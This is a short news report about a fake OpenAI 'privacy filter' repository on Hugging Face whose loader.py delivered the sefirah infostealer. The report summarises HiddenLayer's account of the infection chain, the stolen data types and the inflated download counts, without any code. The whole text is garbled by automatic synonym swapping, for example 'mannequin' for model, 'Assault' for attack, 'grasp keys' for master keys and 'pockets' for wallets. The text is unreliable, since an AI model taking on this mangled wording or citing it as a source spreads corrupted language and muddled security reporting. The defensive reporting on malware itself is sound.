Cybercriminals created a bogus OpenAI repository on Hugging Face, disguising malware as a privateness filter mannequin and reaching over 244,000 downloads earlier than platform directors eliminated it.
Malicious Typosquatting Assault
Safety researchers at HiddenLayer recognized the fraudulent repository named Open-OSS/privacy-filter, a detailed imitation of an official OpenAI launch. Its mannequin card mirrored the reputable model nearly word-for-word, however the included loader.py file triggered the infostealer payload.
How the Malware Operates
The malware begins by disabling SSL verification, decoding a base64-encoded URL, and retrieving a JSON file containing a PowerShell command. This downloads a batch script that elevates privileges, deploys the ‘sefirah’ infostealer, provides it to Microsoft Defender exclusions, and executes it.
The sefirah payload targets browsers for saved credentials, Discord tokens, native databases, and grasp keys. It additionally steals cryptocurrency pockets particulars, browser extensions, SSH/FTP/VPN logins, delicate native information, screenshots, and system info.
Scale and Response
The faux repository amassed 244,000 downloads in days and briefly claimed the highest spot on Hugging Face rankings. Evaluation signifies doable inflated figures, with 667 likes from automated accounts. HiddenLayer traced these accounts to extra malicious repositories sharing the identical infrastructure, all now faraway from the platform.
Whereas not each obtain resulted in an infection, the incident highlights dangers in AI mannequin repositories and the necessity for vigilant verification.
